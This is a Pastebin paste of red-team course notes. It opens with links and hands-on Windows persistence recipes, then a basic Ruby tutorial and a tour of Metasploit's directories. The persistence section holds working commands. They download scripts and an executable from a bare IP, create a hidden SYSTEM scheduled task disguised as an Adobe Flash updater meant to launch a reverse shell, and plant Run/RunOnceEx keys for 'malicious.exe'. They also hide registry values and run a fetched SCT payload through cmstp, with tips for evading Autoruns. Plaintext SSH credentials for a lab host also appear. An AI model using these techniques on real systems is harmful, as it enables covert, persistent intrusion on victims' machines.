joemccray

Attack & Defense 2020

Sep 16th, 2019
809
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ################################
  2. # Attack Environment Deployers #
  3. ################################
  4. https://github.com/mantvydasb/Red-Team-Infrastructure-Automation
  5.  
  6.  
  7.  
  8.  
  9. #################
  10. # Lab Deployers #
  11. #################
  12. https://github.com/jaredhaight/PowerShellClassLab
  13. https://github.com/outflanknl/Invoke-ADLabDeployer
  14. https://github.com/AutomatedLab/AutomatedLab
  15.  
  16.  
  17.  
  18.  
  19. ###############
  20. # Persistence #
  21. ###############
  22. https://rastamouse.me/2018/03/a-view-of-persistence/
  23. https://blog.inspired-sec.com/archive/2017/01/20/WMI-Persistence.html
  24. https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
  25. https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
  26.  
  27.  
  28.  
  29.  
  30. ####################
  31. # Lateral Movement #
  32. ####################
  33.  
  34.  
  35. ###########################
  36. # Bypassing EDR Solutions #
  37. ###########################
  38. https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
  39. https://github.com/vysecurity/morphHTA
  40. https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/
  41.  
  42.  
  43.  
  44. ###############################
  45. # Device Guard Check & Bypass #
  46. ###############################
  47. https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-OSiRis.ps1
  48.  
  49.  
  50. ######################
  51. # EDR Check & Bypass #
  52. ######################
  53. https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-EDRCheck.ps1
  54.  
  55.  
  56.  
  57.  
  58. ###############
  59. # Persistance #
  60. ###############
  61.  
  62.  
  63. ---- Scheduled Task Based Persistance ----
  64. 1. Scheduled task based on most commonly occuring event ID
  65. https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1
  66.  
  67.  
  68.  
  69. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  70.  
  71. ---------------------------Type This-----------------------------------
  72. mkdir c:\persistence
  73.  
  74. cd c:\persistence
  75.  
  76. Get-ExecutionPolicy
  77. Set-ExecutionPolicy Unrestricted –Force
  78.  
  79. $client = new-object System.Net.WebClient
  80. $client.DownloadFile("https://raw.githubusercontent.com/TestingPens/MalwarePersistenceScripts/master/user_event_persistence.ps1","c:\persistence\user_event_persistence.ps1")
  81.  
  82. dir
  83.  
  84. .\user_event_persistence.ps1
  85. -------------------------------------------------------------------------
  86.  
  87.  
  88.  
  89. - Alternative method 1:
  90. -----------------------
  91. As administrator create a basic task as an administrator with the following information:
  92.  
  93. Name: Adobe Systems Incorporated
  94.  
  95. Description: This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.
  96.  
  97.  
  98.  
  99. Task Trigger: Daily
  100.  
  101. Start a program: C:\Windows\System32\calc.exe
  102.  
  103.  
  104.  
  105. - Alternative method 2:
  106. -----------------------
  107. In this case we will not be running PowerShell. We create a scheduled task definition file called "Adobe Flash Player Updater.xml"
  108.  
  109. - Copy and paste the code below into the "Adobe Flash Player Updater.xml" definition file on target machine:
  110. - adapt <UserId></UserId> to SID of current user if you do not have administrative privileges (wmic useraccount where name='user' get sid)
  111. - adapt <Command>C:\Windows\System32\calc.exe</Command> to your reverse shell executable
  112. - this scheduled task triggers on a event, can be changed to regular calls (e.g. once an hour)
  113.  
  114. --------------------------------
  115. <?xml version="1.0" encoding="UTF-16"?>
  116. <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  117. <RegistrationInfo>
  118. <Author>Adobe Systems Incorporated</Author>
  119. <Description>This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.</Description>
  120. </RegistrationInfo>
  121. <Triggers>
  122. <EventTrigger>
  123. <Enabled>true</Enabled>
  124. <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
  125. </EventTrigger>
  126. </Triggers>
  127. <Principals>
  128. <Principal id="Author">
  129. <UserId>S-1-5-18</UserId>
  130. <RunLevel>LeastPrivilege</RunLevel>
  131. </Principal>
  132. </Principals>
  133. <Settings>
  134. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
  135. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
  136. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
  137. <AllowHardTerminate>true</AllowHardTerminate>
  138. <StartWhenAvailable>true</StartWhenAvailable>
  139. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
  140. <IdleSettings>
  141. <StopOnIdleEnd>true</StopOnIdleEnd>
  142. <RestartOnIdle>false</RestartOnIdle>
  143. </IdleSettings>
  144. <AllowStartOnDemand>true</AllowStartOnDemand>
  145. <Enabled>true</Enabled>
  146. <Hidden>true</Hidden>
  147. <RunOnlyIfIdle>false</RunOnlyIfIdle>
  148. <WakeToRun>false</WakeToRun>
  149. <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
  150. <Priority>7</Priority>
  151. </Settings>
  152. <Actions Context="Author">
  153. <Exec>
  154. <Command>C:\Windows\System32\calc.exe</Command>
  155. </Exec>
  156. </Actions>
  157. </Task>
  158.  
  159. ---------------------------
  160.  
  161. Now let's create the scheduled task
  162. ---------------------------Type This-----------------------------------
  163. schtasks /create /tn "Adobe Updater" /xml "Adobe Flash Player Updater.xml"
  164. -----------------------------------------------------------------------
  165.  
  166.  
  167. Sit back and wait for the task to trigger. By the way we got the correct XML file format by creating a scheduled tasked and exporting it to an XML file. Then we were able to make some trivial changes to the file and import it.
  168.  
  169.  
  170.  
  171.  
  172. ---- Registry Based Persistance ---
  173. 1. RunOnce key persistance trick
  174. Reference:
  175. https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
  176.  
  177.  
  178.  
  179. 1. upload your executable to system
  180. 2. add registry entry (requires admin privileges):
  181. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001 /v "Line1" /d "||c:\path\to\malicious.exe"
  182.  
  183. Note:
  184. Beacon/Shell may prevent the user to login as he is hanging in the Beacon executable. Solution: spawn new beacon and exit initial beacon.
  185.  
  186.  
  187.  
  188.  
  189.  
  190. 2. GLOBALFLAGS IN IMAGE FILE EXECUTION OPTIONS
  191. Let's try this:
  192. https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
  193.  
  194.  
  195. 2. Hide Reg
  196. Let's try this code out:
  197. https://gist.github.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741
  198.  
  199. Reference:
  200. https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
  201.  
  202.  
  203.  
  204.  
  205. Get the following two files
  206. ---------------------------
  207. https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1
  208. https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1
  209.  
  210. In "PSReflect-RegHide.ps1" line 126, you can specify which command will be executed upon reboot (ex: 'cmd /c calc.exe'). It will be invisible for regedit and powershell.
  211.  
  212. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  213.  
  214. ---------------------------Type This-----------------------------------
  215. mkdir c:\persistence
  216.  
  217. cd c:\persistence
  218.  
  219. (new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1", "c:\persistence\PSReflect.ps1")
  220.  
  221. (new-object System.Net.WebClient).DownloadFile("https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1", "c:\persistence\PSReflect-RegHide.ps1")
  222.  
  223. .\PSReflect-RegHide.ps1
  224. -------------------------------------------------------------------------
  225.  
  226.  
  227.  
  228. Now, let's check to see if the newly created registry value is hidden. You can do this by typing the following:
  229. ---------------------------Type This-----------------------------------
  230. reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  231. Get-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
  232. -----------------------------------------------------------------------
  233. However, it will be visible e.g. for Sysinternals Autorun tool
  234.  
  235.  
  236.  
  237. 3. VShadow
  238. Let's try this out:
  239. https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/
  240.  
  241.  
  242.  
  243. 1. Download vshadow.exe including in the WinSDK
  244. Windows 7: https://www.microsoft.com/en-us/download/details.aspx?id=8279
  245. Windows 10: https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk
  246. 2. Upload the vshadow.exe to the target machine
  247. 3. Choose an arbitrary persistence mechanism to start vshadow.exe (e.g. Reg Key: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Temp\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:")
  248.  
  249.  
  250. ---------------------------Type This-----------------------------------
  251. mkdir c:\persistence
  252.  
  253. cd c:\persistence
  254.  
  255. $client = new-object System.Net.WebClient
  256. $client.DownloadFile("http://45.63.104.73/win10_vshadow_x64.exe","c:\persistence\win10_vshadow_x64.exe")
  257.  
  258.  
  259. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "c:\persistence\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:"
  260. -----------------------------------------------------------------------
  261.  
  262.  
  263. 4. INF-SCT
  264. Let's try this out:
  265. https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
  266. https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
  267.  
  268.  
  269. Technique 1: CMSTP
  270. ------------------
  271. create "c:\persistence\cmstp.inf" with the following content:
  272. -----------------------------------
  273. ;cmstp.exe cmstp.inf
  274.  
  275. [version]
  276. Signature=$chicago$
  277. AdvancedINF=2.5
  278.  
  279. [DefaultInstall_SingleUser]
  280. UnRegisterOCXs=UnRegisterOCXSection
  281.  
  282. [UnRegisterOCXSection]
  283. %11%\scrobj.dll,NI,c:\persistence\test.sct
  284.  
  285. [Strings]
  286. AppAct = "SOFTWARE\Microsoft\Connection Manager"
  287. ServiceName="Yay"
  288. ShortSvcName="Yay"
  289. ----------------------------------------------------
  290.  
  291.  
  292.  
  293. get a sample sct payload (e.g. https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct) and store it in "c:\persistence\test.sct"
  294.  
  295.  
  296. ---------------------------Type This-----------------------------------
  297. mkdir c:\persistence
  298.  
  299. cd c:\persistence
  300.  
  301. $client = new-object System.Net.WebClient
  302. $client.DownloadFile("https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct","c:\persistence\test.sct")
  303.  
  304. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oemkey /t reg_sz /d C:\Windows\System32\cmstp.exe\" /s C:\persistence\cmstp.inf"
  305. -----------------------------------------------------------------------
  306.  
  307.  
  308. reboot your machine
  309. your sct payload will be executed upon reboot. HOWEVER, as a Windows binary executes it, Sysinternals Autorun tool will not show it, unless you untick "Options->Hide Windows Entries" option
  310.  
  311.  
  312.  
  313. 5. GPScript.exe
  314. Let's try this out:
  315. https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
  316.  
  317.  
  318.  
  319. ---- Cobalt Strike Agressor Persistance Scripts ----
  320. https://github.com/Und3rf10w/Aggressor-scripts/blob/master/kits/PersistKit/PersistKit.cna
  321. https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/UserSchtasksPersist.cna
  322. https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/ServiceEXEPersist.cna
  323.  
  324.  
  325.  
  326.  
  327.  
  328. -------------------------------------------------------------------------------------------------------------
  329.  
  330. ############################
  331. # Day 2: Ruby Fundamentals #
  332. ############################
  333.  
  334. - I prefer to use Putty to SSH into my Linux host.
  335. - You can download Putty from here:
  336. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  337.  
  338. Here is the information to put into putty
  339.  
  340. Host Name: 149.28.201.171
  341. protocol: ssh
  342. port: 22
  343. username: secureninja
  344. password: secureninja!!
  345.  
  346. - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
  347. scientist and programmer from Japan. It is a cross-platform dynamic language.
  348.  
  349. - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
  350. on Rails is a framework that is written in Ruby.
  351.  
  352. - Ruby's file name extensions are .rb and .rbw.
  353.  
  354. - official website of this
  355.  
  356. - language: www.ruby-lang.org.
  357.  
  358.  
  359. - interactive Shell called Ruby Shell
  360.  
  361.  
  362. - open up the interactive console and play around.
  363.  
  364. ---------------------------Type This-----------------------------------
  365. irb
  366. -----------------------------------------------------------------------
  367.  
  368.  
  369. - Math, Variables, Classes, Creating Objects and Inheritance
  370.  
  371.  
  372. The following arithmetic operators:
  373. Addition operator (+) — 10 + 23
  374. Subtraction operator (-) — 1001 - 34
  375. Multiplication operator (*) — 5 * 5
  376. Division operator (/) — 12 / 2
  377.  
  378.  
  379.  
  380. - Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
  381. operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
  382. 30. Again, 69 is assigned to y, and then y is incremented by 33.
  383.  
  384. ---------------------------Type This-----------------------------------
  385. x = 25
  386. x + 30
  387. y = 69
  388. y+33
  389. -----------------------------------------------------------------------
  390.  
  391.  
  392.  
  393. - Let's look at creating classes and creating objects.
  394.  
  395. - Here, the name of the class is Attack. An object has its properties and methods.
  396.  
  397.  
  398. ---------------------------Type This-----------------------------------
  399. class Attack
  400. attr_accessor :of, :sqli, :xss
  401. end
  402. -----------------------------------------------------------------------
  403.  
  404.  
  405. What is nil?
  406. Reference:
  407. https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
  408.  
  409. nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
  410.  
  411. Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
  412.  
  413. To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
  414.  
  415.  
  416.  
  417.  
  418.  
  419. # Now that we have created the classes let's create the objects
  420. ---------------------------Type This-----------------------------------
  421. first_attack = Attack.new
  422. first_attack.of = "stack"
  423. first_attack.sqli = "blind"
  424. first_attack.xss = "dom"
  425. puts first_attack.of
  426. puts first_attack.sqli
  427. puts first_attack.xss
  428. -----------------------------------------------------------------------
  429.  
  430.  
  431.  
  432.  
  433. - Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
  434. inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
  435. one object can access the properties/attributes of another object of a different class. Inheritance makes your
  436. programming life easier by maximizing code reuse.
  437.  
  438.  
  439. ---------------------------Type This-----------------------------------
  440. class Exploitframeworks
  441. attr_accessor :scanners, :exploits, :shellcode, :postmodules
  442. end
  443. class Metasploit < Exploitframeworks
  444. end
  445. class Canvas < Exploitframeworks
  446. end
  447. class Coreimpact < Exploitframeworks
  448. end
  449. class Saint < Exploitframeworks
  450. end
  451. class Exploitpack < Exploitframeworks
  452. end
  453. -----------------------------------------------------------------------
  454.  
  455.  
  456.  
  457.  
  458. - Methods, More Objects, Arguments, String Functions and Expression Shortcuts
  459.  
  460. - Let's create a simple method. A method is used to perform an action and is generally called with an object.
  461.  
  462. - Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
  463. it will print this string: "We are Learning how to PenTest"
  464.  
  465. - An object named 'bo' is created, which is used to call the method.
  466.  
  467.  
  468. ---------------------------Type This-----------------------------------
  469. class Msfnl
  470. def learning
  471. puts "We are Learning how to PenTest"
  472. end
  473. end
  474. -----------------------------------------------------------------------
  475.  
  476. #Now let's define an object for our Method
  477.  
  478. ---------------------------Type This-----------------------------------
  479. joe = Msfnl.new
  480. joe.learning
  481. -----------------------------------------------------------------------
  482.  
  483.  
  484.  
  485. - An argument is a value or variable that is passed to the function while calling it. In the following example, while
  486. calling the puts() function, we are sending a string value to the function. This string value is used by the
  487. function to perform some particular operations.
  488.  
  489. puts ("Pentesting")
  490.  
  491.  
  492. - There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
  493. explain some useful string functions with an example.
  494.  
  495. - The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
  496. reverse function reverses a string. The following example demonstrates how to use the string functions.
  497.  
  498. ---------------------------Type This-----------------------------------
  499. 55.class
  500. "I Love Programming".class
  501. "I Love Pentesting".length
  502. "Pown that box".upcase
  503. "Love" + "To Root Boxes"
  504. "evil".reverse
  505. "evil".reverse.upcase
  506. -----------------------------------------------------------------------
  507.  
  508.  
  509. - expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is
  510. an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
  511. examples of some expressions.
  512.  
  513. ---------------------------Type This-----------------------------------
  514. a = 3
  515. b = 6
  516. a+b+20
  517. d = 44
  518. f = d
  519. puts f
  520. -----------------------------------------------------------------------
  521.  
  522.  
  523.  
  524.  
  525.  
  526. - shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
  527. assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
  528. statements to understand the shortcuts.
  529.  
  530. ---------------------------Type This-----------------------------------
  531. g = 70
  532. g = g+44
  533. g += 33
  534. -----------------------------------------------------------------------
  535.  
  536.  
  537. - In the above statement, g is incremented by 33 and then the total value is assigned to g.
  538.  
  539.  
  540.  
  541. ---------------------------Type This-----------------------------------
  542. g *= 3
  543. -----------------------------------------------------------------------
  544.  
  545.  
  546. - In the above statement, g is multiplied with 3 and then assigned to g.
  547.  
  548. - Example
  549.  
  550. - Comparison Operators, Loops, Data Types, and Constants
  551.  
  552. - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
  553. how to use the following comparison operators.
  554.  
  555. 'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
  556. variable or constant. If it's less than the other, the 'less than' operator returns true.
  557.  
  558. 'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
  559. or constant. If it's equal to the other, the 'equal to' operator returns true.
  560.  
  561. 'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
  562. variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
  563.  
  564. ---------------------------Type This-----------------------------------
  565. numberofports = 55
  566. puts "number of ports found during scan" if numberofports < 300
  567. numberofports = 400
  568. puts "number of ports found during scan" if numberofports < 300
  569. puts "number of ports found during scan" if numberofports == 300
  570. puts "number of ports found during scan" if numberofports != 300
  571. -----------------------------------------------------------------------
  572.  
  573.  
  574.  
  575. Example
  576.  
  577.  
  578. - the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.
  579.  
  580. - This operator is generally used to combine multiple conditions.
  581. - In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
  582.  
  583. - following example to understand how this operator works.
  584.  
  585. ---------------------------Type This-----------------------------------
  586. ports = 100
  587. puts "number of ports found on the network" if ports<100 || ports>200
  588. puts "number of ports found on the network" if ports<100 || ports>75
  589. -----------------------------------------------------------------------
  590.  
  591. # unless
  592.  
  593. ---------------------------Type This-----------------------------------
  594. portsbelow1024 = 50
  595. puts "If the ports are below 1024" unless portsbelow1024 < 1000
  596. puts "If the ports are below 1024" unless portsbelow1024 < 1055
  597. puts "If the ports are below 1024" unless portsbelow1024 < 20
  598. -----------------------------------------------------------------------
  599.  
  600. - The 'unless' keyword is used to do something programmatically unless a condition is true.
  601.  
  602.  
  603.  
  604. - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
  605.  
  606. - See the following example to understand how a string is printed 10 times on the screen using a loop.
  607.  
  608. ---------------------------Type This-----------------------------------
  609. 10.times do puts "infosecaddicts" end
  610. -----------------------------------------------------------------------
  611.  
  612. # Or use the curly braces
  613.  
  614. ---------------------------Type This-----------------------------------
  615. 10.times {puts "infosecaddicts"}
  616. -----------------------------------------------------------------------
  617.  
  618.  
  619. - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
  620. working with different data types. Data type conversion is also known as type casting.
  621.  
  622.  
  623.  
  624. - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
  625. change the value of a constant, you will see a warning message.
  626.  
  627.  
  628.  
  629.  
  630. - Multiple Line String Variable, Interpolation, and Regular Expressions
  631.  
  632. - A multiple line string variable lets you assign the value to the string variable through multiple lines.
  633.  
  634. ---------------------------Type This-----------------------------------
  635. infosecaddicts = <<mark
  636. welcome
  637. to the
  638. best
  639. metasploit
  640. course
  641. on the
  642. market
  643. mark
  644. puts infosecaddicts
  645. -----------------------------------------------------------------------
  646.  
  647.  
  648. - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
  649. it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
  650. Examine the following example to understand how interpolation works in Ruby.
  651.  
  652. References:
  653. https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
  654.  
  655.  
  656. ---------------------------Type This-----------------------------------
  657. a = 4
  658. b = 6
  659. puts "a * b = a*b"
  660. puts " #{a} * #{b} = #{a*b} "
  661. person = "Joe McCray"
  662. puts "IT Security consultant person"
  663. puts "IT Security consultant #{person}"
  664. -----------------------------------------------------------------------
  665.  
  666. - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
  667.  
  668.  
  669.  
  670.  
  671.  
  672. - Character classes
  673. ---------------------------Type This-----------------------------------
  674. infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
  675. "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
  676. "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
  677. -----------------------------------------------------------------------
  678.  
  679.  
  680. - Arrays, Push and Pop, and Hashes
  681.  
  682.  
  683. - In the following example, numbers is an array that holds 6 integer numbers.
  684.  
  685.  
  686. ---------------------------Type This-----------------------------------
  687. numbers = [2,4,6,8,10,100]
  688. puts numbers[0]
  689. puts numbers[4]
  690. numbers[2] = 150
  691. puts numbers
  692. -----------------------------------------------------------------------
  693.  
  694.  
  695.  
  696. - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
  697.  
  698.  
  699. ---------------------------Type This-----------------------------------
  700. framework = []
  701. framework << "modules"
  702. framework << "exploits"
  703. framework << "payloads"
  704. framework.pop
  705. framework.shift
  706. -----------------------------------------------------------------------
  707.  
  708. - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
  709. that is used to access the element.
  710.  
  711.  
  712. - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
  713. In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
  714. respective values: 'what module should you use', 'Windows XP' and 'SSH'.
  715.  
  716. ---------------------------Type This-----------------------------------
  717. metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
  718. print metasploit.size
  719. print metasploit["microsoft"]
  720. metasploit['microsoft'] = 'redhat'
  721. print metasploit['microsoft']
  722. -----------------------------------------------------------------------
  723.  
  724.  
  725.  
  726. - Writing Ruby Scripts
  727.  
  728.  
  729. - Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
  730. this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
  731. someone made to look for a specific port. The port that it is looking for is port 21 FTP.
  732. ---------------------------Type This-----------------------------------
  733. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  734. ls
  735. -----------------------------------------------------------------------
  736.  
  737.  
  738.  
  739. ###########################
  740. # Metasploit Fundamentals #
  741. ###########################
  742.  
  743. - Let's take a little look at Metasploit Framework
  744.  
  745. - First, we should take note of the different directories, the Modular Architecture.
  746.  
  747. The modules that make up the Modular Architecture are
  748. Exploits
  749. Auxiliary
  750. Payload
  751. Encoder
  752. Nops
  753.  
  754.  
  755. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
  756.  
  757. are
  758.  
  759. Modules
  760. Scripts
  761. Plugins
  762. External
  763. Data
  764. Tools
  765.  
  766. - Let's take a look inside the Metasploit directory and see what's the
  767. ---------------------------Type This-----------------------------------
  768. cd ~/toolz/metasploit
  769. ls
  770. -----------------------------------------------------------------------
  771.  
  772.  
  773.  
  774. - Now let's take a look inside the Modules directory and see what's there.
  775. ---------------------------Type This-----------------------------------
  776. cd ~/toolz/metasploit/modules
  777. ls
  778. -----------------------------------------------------------------------
  779.  
  780.  
  781. The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
  782. not necessarily need to - have a shell or session started on a machine.
  783.  
  784. The exploits directory has our modules that we need to pop a shell on a box.
  785. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
  786. like Burp Suite
  787. - Let's take a look at the external directory
  788. ---------------------------Type This-----------------------------------
  789. cd ~/toolz/metasploit/external
  790. ls
  791. -----------------------------------------------------------------------
  792.  
  793. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  794. ---------------------------Type This-----------------------------------
  795. cd ~/toolz/metasploit/data
  796. ls
  797. -----------------------------------------------------------------------
  798.  
  799. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  800. brute-forcing
  801. ---------------------------Type This-----------------------------------
  802. cd ~/toolz/metasploit/data/wordlists
  803. ls
  804. -----------------------------------------------------------------------
  805.  
  806. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  807. once a session is created.
  808. ---------------------------Type This-----------------------------------
  809. cd ~/toolz/metasploit/data/meterpreter
  810. ls
  811. -----------------------------------------------------------------------
  812.  
  813. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  814. like escalating privileges and dumping hashes.
  815.  
  816. These are being phased out, though, and post-exploitation modules are what is being more preferred.
  817. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  818. find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
  819. for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
  820. custom shellcode.
  821.  
  822. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  823. to do with other programs to make things like importing and exporting reports simple.
  824. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  825. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  826. modules we're going to have a better understanding of where everything needs to go.
  827. ---------------------------Type This-----------------------------------
  828. cd ~/toolz/metasploit/modules/exploits
  829. ls
  830. -----------------------------------------------------------------------
  831.  
  832.  
  833. - The exploits directory is split up into several different directories, each one housing exploits for different types
  834. of systems. I.E. Windows, Unix, OSX, dialup and so on.
  835. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  836. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  837. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  838. for us.
  839. ---------------------------Type This-----------------------------------
  840. cd ~/toolz/metasploit/modules/auxiliary/
  841. ls
  842. -----------------------------------------------------------------------
  843.  
  844.  
  845. - And a little further into the directory, let's take a look at what's in the scanner directory
  846. ---------------------------Type This-----------------------------------
  847. cd ~/toolz/metasploit/modules/auxiliary/scanner/
  848. ls
  849. -----------------------------------------------------------------------
  850.  
  851.  
  852. - And one more folder deeper into the structure, let's take a look in the portscan folder
  853. ---------------------------Type This-----------------------------------
  854. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  855. ls
  856. -----------------------------------------------------------------------
  857.  
  858. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  859. and report them back to us in a nice, easily readable format.
  860.  
  861. cat tcp.rb
  862.  
  863.  
  864.  
  865. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  866. once you have a session on a machine.
  867. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  868. succeeds.
  869. ---------------------------Type This-----------------------------------
  870. cd ~/toolz/metasploit/modules/payloads/
  871. ls
  872. -----------------------------------------------------------------------
  873.  
  874.  
  875. - There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
  876. application for it to be used as.
  877. Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
  878. do everything once you have that shell calling back to you.
  879. Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
  880. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  881. much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
  882. to download Stages payloads.
